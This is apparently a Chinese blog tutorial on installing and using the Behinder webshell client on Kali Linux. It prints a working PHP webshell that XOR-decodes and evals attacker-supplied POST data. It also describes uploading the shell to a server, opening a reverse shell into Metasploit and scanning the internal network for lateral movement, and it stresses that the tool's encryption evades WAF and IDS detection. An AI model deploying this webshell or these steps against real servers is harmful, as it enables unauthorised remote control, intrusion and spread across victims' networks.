Kali Linux安装神器：冰蝎一键部署

在之前的文章中，我们已经介绍了许多 WebShell 管理工具，比如蚁剑（AntSword）、Weevely 等。本文将向大家推荐另外一款神器：冰蝎（Behinder）。

关于冰蝎

冰蝎是一款动态二进制加密网站客户端，以其流量动态加密的特性而闻名，使得攻击特征对安全设备（如 WAF、WebIDS）难以检测。

冰蝎通信过程中采用 AES（高级加密标准，对称加密）进行加密。Java 和 .NET 默认支持 AES，而在 PHP 中需要开启 OpenSSL 扩展。在 V2.0 版本之后，冰蝎会根据服务端支持情况动态选择加密方式，使其更加强大。而在 V3.0 中引入了预共享密钥，实现全程无明文交互，给 WAF、IDS 设备的威胁检测带来了挑战。

在 Kali 中的安装

在常规情况下，冰蝎需要 Java 环境。由于 Kali 中已经预先安装了 Java，因此我们无需再次安装。但如果是其他环境，则需要先安装 Java 环境。您可以从项目地址 https://github.com/rebeyond/Behinder/releases 下载最新版本的安装包。

下载完成后，文件目录结构如下：

运行

只需执行以下命令即可运行：

java -jar Behinder.jar

使用

生成 WebShell

关于密码

我们需要在一个 MD5 加密网站上生成密码，然后将生成的 MD5 值的小写 32 位前 16 位作为密码。

点击生成服务端后，文件将存放在 server/default_xor_base64/ 目录下。

<?php @error_reporting(0); function Decrypt($data) { $key=”e45e329feb5d925b”; $bs=”base64_”.”decode”; $after=$bs($data.””); for($i=0;$i<strlen($after);$i++) { $after[$i] = $after[$i]^$key[$i+1&15]; } return $after; } $post=Decrypt(file_get_contents(“php://input”)); @eval($post); ?>

对 PHP 文件进行扫插

[图片]

上传服务器测试

将生成的 PHP 文件上传到服务器，并进行连接。

基本信息

文件管理

端口映射

反弹 Shell

您可以根据提示配置 Metasploit 相关信息，然后点击 “给我连”，此时会将会话反弹至 Metasploit 中。

内网主机扫描

利用此功能，可以扫描同一局域网内的设备，从而实现横向渗透。